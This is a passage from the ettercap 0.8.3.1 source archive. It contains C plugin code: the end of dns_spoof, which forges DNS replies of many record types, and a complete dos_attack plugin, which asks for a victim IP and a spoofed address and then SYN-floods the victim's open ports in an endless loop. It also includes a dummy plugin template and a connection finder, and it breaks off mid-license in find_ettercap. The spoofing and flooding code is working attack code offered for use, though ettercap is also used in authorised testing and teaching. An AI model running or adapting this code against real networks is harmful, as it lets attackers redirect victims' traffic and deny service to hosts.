USER_MSG("dns_spoof: %s [%s] spoofed to [%s] TTL [%u s]\n", type_str(type), name, ip_addr_ntoa(reply, tmp), ttl); } } /* AAAA */ any_mx: /* it is an MX query (mail to ip) */ if (type == ns_t_mx || type == ns_t_any) { /* found the reply in the list */ if (get_spoofed_mx(name, &reply, &ttl) != E_SUCCESS) { /* in case of ANY we have to proceed with the next section */ if (type == ns_t_any) goto any_wins; else return -E_NOTFOUND; } /* allocate memory for the answer */ len = 12 + 2 + 7; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* convert to network-byte order */ dns_ttl = htonl(ttl); /* prepare the answer */ memcpy(p, "\xc0\x0c", 2); /* compressed name offset */ memcpy(p + 2, "\x00\x0f", 2); /* type MX */ memcpy(p + 4, "\x00\x01", 2); /* class */ memcpy(p + 6, &dns_ttl, 4); /* TTL */ memcpy(p + 10, "\x00\x09", 2); /* datalen */ memcpy(p + 12, "\x00\x0a", 2); /* preference (highest) */ /* * add "mail." in front of the domain and * resolve it in the additional record * (here `mxoffset' is pointing at) */ memcpy(p + 14, "\x04mail\xc0\x0c", 7); /* mx record */ /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&answer_list, rr, next); *dns_len += len; *n_answ += 1; /* add the additional record for the spoofed IPv4 address*/ if (ntohs(reply->addr_type) == AF_INET) { /* allocate memory for the additional record */ len = 17 + IP_ADDR_LEN; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* prepare the additinal record */ memcpy(p, "\x04mail\xc0\x0c", 7); /* compressed name offset */ memcpy(p + 7, "\x00\x01", 2); /* type A */ memcpy(p + 9, "\x00\x01", 2); /* class */ memcpy(p + 11, &dns_ttl, 4); /* TTL */ memcpy(p + 15, "\x00\x04", 2); /* datalen */ ip_addr_cpy(p + 17, reply); /* data */ } /* add the additional record for the spoofed IPv6 address*/ else if (ntohs(reply->addr_type) == AF_INET6) { /* allocate memory for the additional record */ len = 17 + IP6_ADDR_LEN; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* prepare the additional record */ memcpy(p, "\x04mail\xc0\x0c", 7); /* compressed name offset */ memcpy(p + 7, "\x00\x1c", 2); /* type AAAA */ memcpy(p + 9, "\x00\x01", 2); /* class */ memcpy(p + 11, &dns_ttl, 4); /* TTL */ memcpy(p + 15, "\x00\x10", 2); /* datalen */ ip_addr_cpy(p + 17, reply); /* data */ } else { /* IP address not valid - abort */ return -E_INVALID; } /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&additional_list, rr, next); *dns_len += len; *n_addi += 1; USER_MSG("dns_spoof: %s [%s] spoofed to [%s] TTL [%u s]\n", type_str(type), name, ip_addr_ntoa(reply, tmp), ttl); } /* MX */ any_wins: /* it is an WINS query (NetBIOS-name to ip) */ if (type == ns_t_wins || type == ns_t_any) { /* found the reply in the list */ if (get_spoofed_wins(name, &reply, &ttl) != E_SUCCESS) { /* in case of ANY we have to proceed with the next section */ if (type == ns_t_any) goto any_txt; else return -E_NOTFOUND; } if (ntohs(reply->addr_type) != AF_INET) /* XXX - didn't find any documentation about this standard * and if type WINS RR only supports IPv4 */ return -E_INVALID; /* allocate memory for the answer */ len = 12 + IP_ADDR_LEN; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* convert to network-byte order */ dns_ttl = htonl(ttl); /* prepare the answer */ memcpy(p, "\xc0\x0c", 2); /* compressed name offset */ memcpy(p + 2, "\xff\x01", 2); /* type WINS */ memcpy(p + 4, "\x00\x01", 2); /* class IN */ memcpy(p + 6, &dns_ttl, 4); /* TTL */ memcpy(p + 10, "\x00\x04", 2); /* datalen */ ip_addr_cpy((u_char*)p + 12, reply); /* data */ /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&answer_list, rr, next); *dns_len += len; *n_answ += 1; USER_MSG("dns_spoof: %s [%s] spoofed to [%s] TTL [%u s]\n", type_str(type), name, ip_addr_ntoa(reply, tmp), ttl); } any_txt: /* it's a descriptive TXT record */ if (type == ns_t_txt || type == ns_t_any) { char *txt; u_int8 txtlen; u_int16 datalen; /* found the reply in the list */ if (get_spoofed_txt(name, &txt, &ttl) != E_SUCCESS) { /* in case of ANY we have to proceed with the next section */ if (type == ns_t_any) goto exit; else return -E_NOTFOUND; } txtlen = strlen(txt); datalen = htons(txtlen + 1); /* allocate memory for the answer */ len = 13 + txtlen; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* convert to network-byte order */ dns_ttl = htonl(ttl); /* prepare the answer */ memcpy(p, "\xc0\x0c", 2); /* compressed name offset */ memcpy(p + 2, "\x00\x10", 2); /* type TXT */ memcpy(p + 4, "\x00\x01", 2); /* class IN */ memcpy(p + 6, &dns_ttl, 4); /* TTL */ memcpy(p + 10, &datalen, 2); /* data len */ memcpy(p + 12, &txtlen, 1); /* TXT len */ memcpy(p + 13, txt, txtlen); /* string */ /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&answer_list, rr, next); *dns_len += len; *n_answ += 1; USER_MSG("dns_spoof: %s [%s] spoofed to \"%s\" TTL [%u s]\n", type_str(type), name, txt, ttl); } /* TXT */ /* it is a reverse query (ip to name) */ if (type == ns_t_ptr) { u_char *answer, *p; char *a; u_char buf[256]; int rlen; /* found the reply in the list */ if (get_spoofed_ptr(name, &a, &ttl) != E_SUCCESS) return -E_NOTFOUND; /* compress the string into the buffer */ rlen = dn_comp(a, buf, 256, NULL, NULL); /* allocate memory for the answer */ len = 12 + rlen; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* convert to network-byte order */ dns_ttl = htonl(ttl); /* prepare the answer */ memcpy(p, "\xc0\x0c", 2); /* compressed name offset */ memcpy(p + 2, "\x00\x0c", 2); /* type PTR */ memcpy(p + 4, "\x00\x01", 2); /* class */ memcpy(p + 6, &dns_ttl, 4); /* TTL */ /* put the length before the dn_comp'd string */ p += 10; NS_PUT16(rlen, p); p -= 12; memcpy(p + 12, buf, rlen); /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&answer_list, rr, next); *dns_len += len; *n_answ += 1; USER_MSG("dns_spoof: %s [%s] spoofed to [%s] TTL [%u s]\n", type_str(type), name, a, ttl); } /* PTR */ /* it is a SRV query (service discovery) */ if (type == ns_t_srv) { char tgtoffset[2]; u_int16 port; int dn_offset = 0; /* found the reply in the list */ if (get_spoofed_srv(name, &reply, &port, &ttl) != E_SUCCESS) return -E_NOTFOUND; /* allocate memory for the answer */ len = 24; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* * to refer the target to a proper domain name, we have to strip the * service and protocol label from the questioned domain name */ dn_offset += *(data+dn_offset) + 1; /* first label (e.g. _ldap)*/ dn_offset += *(data+dn_offset) + 1; /* second label (e.g. _tcp) */ /* avoid offset overrun */ if (dn_offset + 12 > 255) { dn_offset = 0; } tgtoffset[0] = 0xc0; /* offset byte */ tgtoffset[1] = 12 + dn_offset; /* offset to the actual domain name */ /* convert to network-byte order */ dns_ttl = htonl(ttl); /* prepare the answer */ memcpy(p, "\xc0\x0c", 2); /* compressed name offset */ memcpy(p + 2, "\x00\x21", 2); /* type SRV */ memcpy(p + 4, "\x00\x01", 2); /* class IN */ memcpy(p + 6, &dns_ttl, 4); /* TTL */ memcpy(p + 10, "\x00\x0c", 2); /* data length */ memcpy(p + 12, "\x00\x00", 2); /* priority */ memcpy(p + 14, "\x00\x00", 2); /* weight */ p+=16; NS_PUT16(port, p); /* port */ p-=18; /* * add "srv." in front of the stripped domain * name and resolve it in the additional * record (here `srvoffset' is pointing at) */ memcpy(p + 18, "\x03srv", 4); /* target */ memcpy(p + 22, tgtoffset, 2); /* compressed name offset */ /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&answer_list, rr, next); *dns_len += len; *n_answ += 1; /* add the additional record for the spoofed IPv4 address */ if (ntohs(reply->addr_type) == AF_INET) { /* allocate memory for the additional record */ len = 16 + IP_ADDR_LEN; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* prepare the additional record */ memcpy(p, "\x03srv", 4); /* target */ memcpy(p + 4, tgtoffset, 2); /* compressed name offset */ memcpy(p + 6, "\x00\x01", 2); /* type A */ memcpy(p + 8, "\x00\x01", 2); /* class */ memcpy(p + 10, &dns_ttl, 4); /* TTL */ memcpy(p + 14, "\x00\x04", 2); /* datalen */ ip_addr_cpy(p + 16, reply); /* data */ } /* add the additional record for the spoofed IPv6 address*/ else if (ntohs(reply->addr_type) == AF_INET6) { /* allocate memory for the additional record */ len = 16 + IP6_ADDR_LEN; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; memcpy(p, "\x03srv", 4); /* target */ memcpy(p + 4, tgtoffset, 2); /* compressed name offset */ memcpy(p + 6, "\x00\x1c", 2); /* type AAAA */ memcpy(p + 8, "\x00\x01", 2); /* class */ memcpy(p + 10, &dns_ttl, 4); /* TTL */ memcpy(p + 14, "\x00\x10", 2); /* datalen */ ip_addr_cpy(p + 16, reply); /* data */ } else { /* IP address not valid - abort */ return -E_INVALID; } /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&additional_list, rr, next); *dns_len += len; *n_addi += 1; USER_MSG("dns_spoof: %s [%s] spoofed to [%s:%d] TTL [%u s]\n", type_str(type), name, ip_addr_ntoa(reply, tmp), port, ttl); } /* SRV */ if (is_negative && type != ns_t_any) { /* allocate memory for authorative answer */ len = 46; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* convert to network-byte order */ dns_ttl = htonl(ttl); /* prepare the authorative record */ memcpy(p, "\xc0\x0c", 2); /* compressed named offset */ memcpy(p + 2, "\x00\x06", 2); /* type SOA */ memcpy(p + 4, "\x00\x01", 2); /* class */ memcpy(p + 6, &dns_ttl, 4); /* TTL (seconds) */ memcpy(p + 10, "\x00\x22", 2); /* datalen */ memcpy(p + 12, "\x03ns1", 4); /* primary server */ memcpy(p + 16, "\xc0\x0c", 2); /* compressed name offeset */ memcpy(p + 18, "\x05""abuse", 6); /* mailbox */ memcpy(p + 24, "\xc0\x0c", 2); /* compressed name offset */ memcpy(p + 26, "\x51\x79\x57\xf5", 4); /* serial */ memcpy(p + 30, "\x00\x00\x0e\x10", 4); /* refresh interval */ memcpy(p + 34, "\x00\x00\x02\x58", 4); /* retry interval */ memcpy(p + 38, "\x00\x09\x3a\x80", 4); /* erpire limit */ memcpy(p + 42, "\x00\x00\x00\x3c", 4); /* minimum TTL */ /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&authority_list, rr, next); *dns_len += len; *n_auth += 1; USER_MSG("dns_spoof: negative cache spoofed for [%s] type %s, TTL [%u s]\n", name, type_str(type), ttl); } /* SOA */ exit: return E_SUCCESS; } /* * return the ip address for the name - IPv4 */ static int get_spoofed_a(const char *a, struct ip_addr **ip, u_int32 *ttl) { struct dns_spoof_entry *d; SLIST_FOREACH(d, &dns_spoof_head, next) { if (d->type == ns_t_a && match_pattern(a, d->name)) { /* return the pointer to the struct */ *ip = &d->ip; *ttl = d->ttl; return E_SUCCESS; } } return -E_NOTFOUND; } /* * return the ip address for the name - IPv6 */ static int get_spoofed_aaaa(const char *a, struct ip_addr **ip, u_int32 *ttl) { struct dns_spoof_entry *d; SLIST_FOREACH(d, &dns_spoof_head, next) { if (d->type == ns_t_aaaa && match_pattern(a, d->name)) { /* return the pointer to the struct */ *ip = &d->ip; *ttl = d->ttl; return E_SUCCESS; } } return -E_NOTFOUND; } /* * return the TXT string for the name */ static int get_spoofed_txt(const char *name, char **txt, u_int32 *ttl) { struct dns_spoof_entry *d; SLIST_FOREACH(d, &dns_spoof_head, next) { if (d->type == ns_t_txt && match_pattern(name, d->name)) { /* return the pointer to the string */ *txt = d->text; *ttl = d->ttl; return E_SUCCESS; } } return -E_NOTFOUND; } /* * return the name for the ip address */ static int get_spoofed_ptr(const char *arpa, char **a, u_int32 *ttl) { struct dns_spoof_entry *d; struct ip_addr ptr; unsigned int oct[32]; int len, v4len, v6len; u_char ipv4[4]; u_char ipv6[16]; char v4tld[] = "in-addr.arpa"; char v6tld[] = "ip6.arpa"; len = strlen(arpa); v4len = strlen(v4tld); v6len = strlen(v6tld); /* Check the top level domain of the PTR query - IPv4 */ if (strncmp(arpa + len - v4len, v4tld, v4len) == 0) { /* parses the arpa format */ if (sscanf(arpa, "%d.%d.%d.%d.in-addr.arpa", &oct[3], &oct[2], &oct[1], &oct[0]) != 4) return -E_INVALID; /* collect octets */ ipv4[0] = oct[0] & 0xff; ipv4[1] = oct[1] & 0xff; ipv4[2] = oct[2] & 0xff; ipv4[3] = oct[3] & 0xff; /* init the ip_addr structure */ ip_addr_init(&ptr, AF_INET, ipv4); } /* check the top level domain of the PTR query - IPv6 */ else if (strncmp(arpa + len - v6len, v6tld, v6len) == 0) { /* parses the ip6.arpa format for IPv6 reverse pointer */ if (sscanf(arpa, "%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x." "%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x." "%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x.%1x." "%1x.%1x.%1x.%1x.%1x.ip6.arpa", &oct[31], &oct[30], &oct[29], &oct[28], &oct[27], &oct[26], &oct[25], &oct[24], &oct[23], &oct[22], &oct[21], &oct[20], &oct[19], &oct[18], &oct[17], &oct[16], &oct[15], &oct[14], &oct[13], &oct[12], &oct[11], &oct[10], &oct[9], &oct[8], &oct[7], &oct[6], &oct[5], &oct[4], &oct[3], &oct[2], &oct[1], &oct[0]) != 32) { return -E_INVALID; } /* collect octets */ ipv6[0] = (oct[0] << 4) | oct[1]; ipv6[1] = (oct[2] << 4) | oct[3]; ipv6[2] = (oct[4] << 4) | oct[5]; ipv6[3] = (oct[6] << 4) | oct[7]; ipv6[4] = (oct[8] << 4) | oct[9]; ipv6[5] = (oct[10] << 4) | oct[11]; ipv6[6] = (oct[12] << 4) | oct[13]; ipv6[7] = (oct[14] << 4) | oct[15]; ipv6[8] = (oct[16] << 4) | oct[17]; ipv6[9] = (oct[18] << 4) | oct[19]; ipv6[10] = (oct[20] << 4) | oct[21]; ipv6[11] = (oct[22] << 4) | oct[23]; ipv6[12] = (oct[24] << 4) | oct[25]; ipv6[13] = (oct[26] << 4) | oct[27]; ipv6[14] = (oct[28] << 4) | oct[29]; ipv6[15] = (oct[30] << 4) | oct[31]; /* init the ip_addr structure */ ip_addr_init(&ptr, AF_INET6, ipv6); } /* search in the list */ SLIST_FOREACH(d, &dns_spoof_head, next) { /* * we cannot return whildcards in the reply, * so skip the entry if the name contains a '*' */ if (d->type == ns_t_ptr && !ip_addr_cmp(&ptr, &d->ip)) { /* return the pointer to the name */ *a = d->name; *ttl = d->ttl; return E_SUCCESS; } } return -E_NOTFOUND; } /* * return the ip address for the name (MX records) */ static int get_spoofed_mx(const char *a, struct ip_addr **ip, u_int32 *ttl) { struct dns_spoof_entry *d; SLIST_FOREACH(d, &dns_spoof_head, next) { if (d->type == ns_t_mx && match_pattern(a, d->name)) { /* return the pointer to the struct */ *ip = &d->ip; *ttl = d->ttl; return E_SUCCESS; } } return -E_NOTFOUND; } /* * return the ip address for the name (NetBIOS WINS records) */ static int get_spoofed_wins(const char *a, struct ip_addr **ip, u_int32 *ttl) { struct dns_spoof_entry *d; SLIST_FOREACH(d, &dns_spoof_head, next) { if (d->type == ns_t_wins && match_pattern(a, d->name)) { /* return the pointer to the struct */ *ip = &d->ip; *ttl = d->ttl; return E_SUCCESS; } } return -E_NOTFOUND; } /* * return the target for the SRV request */ static int get_spoofed_srv(const char *name, struct ip_addr **ip, u_int16 *port, u_int32 *ttl) { struct dns_spoof_entry *d; SLIST_FOREACH(d, &dns_spoof_head, next) { if (d->type == ns_t_srv && match_pattern(name, d->name)) { /* return the pointer to the struct */ *ip = &d->ip; *port = d->port; *ttl = d->ttl; return E_SUCCESS; } } return -E_NOTFOUND; } char *type_str (int type) { return (type == ns_t_a ? "A" : type == ns_t_aaaa ? "AAAA" : type == ns_t_ptr ? "PTR" : type == ns_t_mx ? "MX" : type == ns_t_wins ? "WINS" : type == ns_t_srv ? "SRV" : type == ns_t_any ? "ANY" : type == ns_t_txt ? "TXT" : "??"); } static void dns_spoof_dump(void) { struct dns_spoof_entry *d; char tmp[MAX_ASCII_ADDR_LEN]; /* Unused variable */ (void) tmp; DEBUG_MSG("dns_spoof entries:"); SLIST_FOREACH(d, &dns_spoof_head, next) { if (d->type == ns_t_txt) { DEBUG_MSG(" %s -> \"%s\", type %s, TTL %u", d->name, d->text, type_str(d->type), d->ttl); } else if (ntohs(d->ip.addr_type) == AF_INET) { if (d->type == ns_t_srv) { DEBUG_MSG(" %s -> [%s:%d], type %s, TTL %u, family IPv4", d->name, ip_addr_ntoa(&d->ip, tmp), d->port, type_str(d->type), d->ttl); } else { DEBUG_MSG(" %s -> [%s], type %s, TTL %u, family IPv4", d->name, ip_addr_ntoa(&d->ip, tmp), type_str(d->type), d->ttl); } } else if (ntohs(d->ip.addr_type) == AF_INET6) { if (d->type == ns_t_srv) { DEBUG_MSG(" %s -> [%s:%d], type %s, TTL %u, family IPv6", d->name, ip_addr_ntoa(&d->ip, tmp), d->port, type_str(d->type), d->ttl); } else { DEBUG_MSG(" %s -> [%s], type %s, TTL %u, family IPv6", d->name, ip_addr_ntoa(&d->ip, tmp), type_str(d->type), d->ttl); } } else { DEBUG_MSG(" %s -> ??", d->name); } } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/dos_attack/000775 000000 000000 00000000000 13711276346 017334 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/dos_attack/dos_attack.c000664 000000 000000 00000016422 13711276346 021621 0ustar00rootroot000000 000000 /* dos_attack -- ettercap plugin -- Run a D.O.S. attack (based on Naptha) Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include /* protos */ int plugin_load(void *); static int dos_attack_init(void *); static int dos_attack_fini(void *); static void parse_arp(struct packet_object *po); #ifdef WITH_IPV6 static void parse_icmp6(struct packet_object *po); #endif static void parse_tcp(struct packet_object *po); EC_THREAD_FUNC(syn_flooder); struct port_list { u_int16 port; SLIST_ENTRY(port_list) next; }; /* globals */ static struct ip_addr fake_host; static struct ip_addr victim_host; SLIST_HEAD(, port_list) port_table; /* plugin operations */ struct plugin_ops dos_attack_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "dos_attack", /* a short description of the plugin (max 50 chars) */ .info = "Run a d.o.s. attack against an IP address", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &dos_attack_init, /* deactivation function */ .fini = &dos_attack_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &dos_attack_ops); } /******************* STANDARD FUNCTIONS *******************/ static int dos_attack_init(void *dummy) { char dos_addr[MAX_ASCII_ADDR_LEN]; char unused_addr[MAX_ASCII_ADDR_LEN]; struct port_list *p; /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("dos_attack: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } /* don't show packets while operating */ EC_GBL_OPTIONS->quiet = 1; memset(dos_addr, 0, sizeof(dos_addr)); memset(unused_addr, 0, sizeof(dos_addr)); ui_input("Insert victim IP: ", dos_addr, sizeof(dos_addr), NULL); if (ip_addr_pton(dos_addr, &victim_host) == -E_INVALID) { INSTANT_USER_MSG("dos_attack: Invalid IP address.\n"); return PLUGIN_FINISHED; } ui_input("Insert unused IP: ", unused_addr, sizeof(unused_addr), NULL); if (ip_addr_pton(unused_addr, &fake_host) == -E_INVALID) { INSTANT_USER_MSG("dos_attack: Invalid IP address.\n"); return PLUGIN_FINISHED; } if(victim_host.addr_type != fake_host.addr_type) { INSTANT_USER_MSG("dos_attack: Address' families don't match.\n"); return PLUGIN_FINISHED; } INSTANT_USER_MSG("dos_attack: Starting scan against %s [Fake Host: %s]\n", dos_addr, unused_addr); /* Delete the "open" port list just in case of previous executions */ while (!SLIST_EMPTY(&port_table)) { p = SLIST_FIRST(&port_table); SLIST_REMOVE_HEAD(&port_table, next); SAFE_FREE(p); } /* Add the hook to "create" the fake host */ if(ntohs(fake_host.addr_type) == AF_INET) hook_add(HOOK_PACKET_ARP_RQ, &parse_arp); #ifdef WITH_IPV6 else if(ntohs(fake_host.addr_type) == AF_INET6) hook_add(HOOK_PACKET_ICMP6_NSOL, &parse_icmp6); #endif /* Add the hook for SYN-ACK reply */ hook_add(HOOK_PACKET_TCP, &parse_tcp); /* create the flooding thread */ ec_thread_new("golem", "SYN flooder thread", &syn_flooder, NULL); return PLUGIN_RUNNING; } static int dos_attack_fini(void *dummy) { pthread_t pid; /* variable not used */ (void) dummy; /* Remove the hooks */ hook_del(HOOK_PACKET_ARP_RQ, &parse_arp); hook_del(HOOK_PACKET_TCP, &parse_tcp); pid = ec_thread_getpid("golem"); /* the thread is active or not ? */ if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); INSTANT_USER_MSG("dos_attack: plugin terminated...\n"); return PLUGIN_FINISHED; } /*********************************************************/ /* * This thread first sends SYN packets to some ports (a little port scan) * then starts to flood active ports with other SYN packets. */ EC_THREAD_FUNC(syn_flooder) { u_int16 sport = 0xe77e, dport; u_int32 seq = 0xabadc0de; struct port_list *p; /* variable not used */ (void) EC_THREAD_PARAM; /* init the thread and wait for start up */ ec_thread_init(); /* First "scan" ports from 1 to 1024 */ for (dport=1; dport<1024; dport++) { send_tcp(&fake_host, &victim_host, sport++, htons(dport), seq++, 0, TH_SYN, NULL, 0); ec_usleep(1000); } INSTANT_USER_MSG("dos_attack: Starting attack...\n"); /* Continue flooding open ports */ LOOP { CANCELLATION_POINT(); SLIST_FOREACH(p, &port_table, next) send_tcp(&fake_host, &victim_host, sport++, p->port, seq++, 0, TH_SYN, NULL, 0); ec_usleep(1000); } return NULL; } /* Parse the arp packets and reply for the fake host */ static void parse_arp(struct packet_object *po) { if (!ip_addr_cmp(&fake_host, &po->L3.dst)) send_arp(ARPOP_REPLY, &po->L3.dst, EC_GBL_IFACE->mac, &po->L3.src, po->L2.src); } #ifdef WITH_IPV6 static void parse_icmp6(struct packet_object *po) { struct ip_addr ip; ip_addr_init(&ip, AF_INET6, po->L4.options); if(!ip_addr_cmp(&fake_host, &ip)) send_L2_icmp6_nadv(&fake_host, &po->L3.src, EC_GBL_IFACE->mac, 0, po->L2.src); } #endif /* * Populate the open port list and reply to * SYN-ACK packets from victim host */ static void parse_tcp(struct packet_object *po) { struct port_list *p; /* Check if it's a reply to our SYN flooding */ if (ip_addr_cmp(&fake_host, &po->L3.dst) || ip_addr_cmp(&victim_host, &po->L3.src) || po->L4.flags != (TH_SYN | TH_ACK)) return; /* Complete the handshake with an ACK */ send_tcp(&fake_host, &victim_host, po->L4.dst, po->L4.src, po->L4.ack, htonl( ntohl(po->L4.seq) + 1), TH_ACK, NULL, 0); /* Check if the port is already in the "open" list... */ SLIST_FOREACH(p, &port_table, next) if (p->port == po->L4.src) return; /* If not...put it in */ SAFE_CALLOC(p, 1, sizeof(struct port_list)); p->port = po->L4.src; SLIST_INSERT_HEAD(&port_table, p, next); INSTANT_USER_MSG("dos_attack: Port %d added\n", ntohs(p->port)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/dummy/000775 000000 000000 00000000000 13711276346 016353 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/dummy/dummy.c000664 000000 000000 00000007061 13711276346 017656 0ustar00rootroot000000 000000 /* dummy -- ettercap plugin -- it does nothig ! only demostrates how to write a plugin ! Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include /* prototypes is required for -Wmissing-prototypes */ /* * this function must be present. * it is the entry point of the plugin */ int plugin_load(void *); /* additional functions */ static int dummy_init(void *); static int dummy_fini(void *); /* plugin operations */ struct plugin_ops dummy_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "dummy", /* a short description of the plugin (max 50 chars) */ .info = "A plugin template (for developers)", /* the plugin version. */ .version = "3.0", /* activation function */ .init = &dummy_init, /* deactivation function */ .fini = &dummy_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { DEBUG_MSG("dummy plugin load function"); /* * in this fuction we MUST call the registration procedure that will set * up the plugin according to the plugin_ops structure. * the returned value MUST be the same as plugin_register() * the opaque pointer params MUST be passed to plugin_register() */ return plugin_register(handle, &dummy_ops); } /*********************************************************/ static int dummy_init(void *dummy) { /* the control is given to this function * and ettercap is suspended until its return. * * you can create a thread and return immediately * and then kill it in the fini function. * * you can also set an hook point with * hook_add(), in this case you have to set the * plugin type to PL_HOOK. */ /* variable not used - avoid extended warning */ (void) dummy; USER_MSG("DUMMY: plugin running...\n"); /* return PLUGIN_FINISHED if the plugin has terminated * its execution. * return PLUGIN_RUNNING if it has spawned a thread or it * is hooked to an ettercap hookpoint and * it needs to be deactivated with the fini method. */ return PLUGIN_RUNNING; } static int dummy_fini(void *dummy) { /* variable not used */ (void) dummy; /* * called to terminate a plugin. * usually to kill threads created in the * init function or to remove hook added * previously. */ USER_MSG("DUMMY: plugin finalization\n"); return PLUGIN_FINISHED; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/find_conn/000775 000000 000000 00000000000 13711276346 017155 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/find_conn/find_conn.c000664 000000 000000 00000005476 13711276346 021272 0ustar00rootroot000000 000000 /* find_conn -- ettercap plugin -- Search connections on a switched LAN Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include /* protos */ int plugin_load(void *); static int find_conn_init(void *); static int find_conn_fini(void *); static void parse_arp(struct packet_object *po); /* plugin operations */ struct plugin_ops find_conn_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "find_conn", /* a short description of the plugin (max 50 chars) */ .info = "Search connections on a switched LAN", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &find_conn_init, /* deactivation function */ .fini = &find_conn_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &find_conn_ops); } /******************* STANDARD FUNCTIONS *******************/ static int find_conn_init(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("find_conn: plugin running...\n"); hook_add(HOOK_PACKET_ARP_RQ, &parse_arp); return PLUGIN_RUNNING; } static int find_conn_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("find_conn: plugin terminated...\n"); hook_del(HOOK_PACKET_ARP_RQ, &parse_arp); return PLUGIN_FINISHED; } /*********************************************************/ /* Parse the arp request */ static void parse_arp(struct packet_object *po) { char tmp1[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; USER_MSG("find_conn: Probable connection attempt %s -> %s\n", ip_addr_ntoa(&po->L3.src, tmp1), ip_addr_ntoa(&po->L3.dst, tmp2)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/find_ettercap/000775 000000 000000 00000000000 13711276346 020027 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/find_ettercap/find_ettercap.c000664 000000 000000 00000011550 13711276346 023004 0ustar00rootroot000000 000000 /* find_ettercap -- ettercap plugin -- Try to discover ettercap activity on the lan Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without 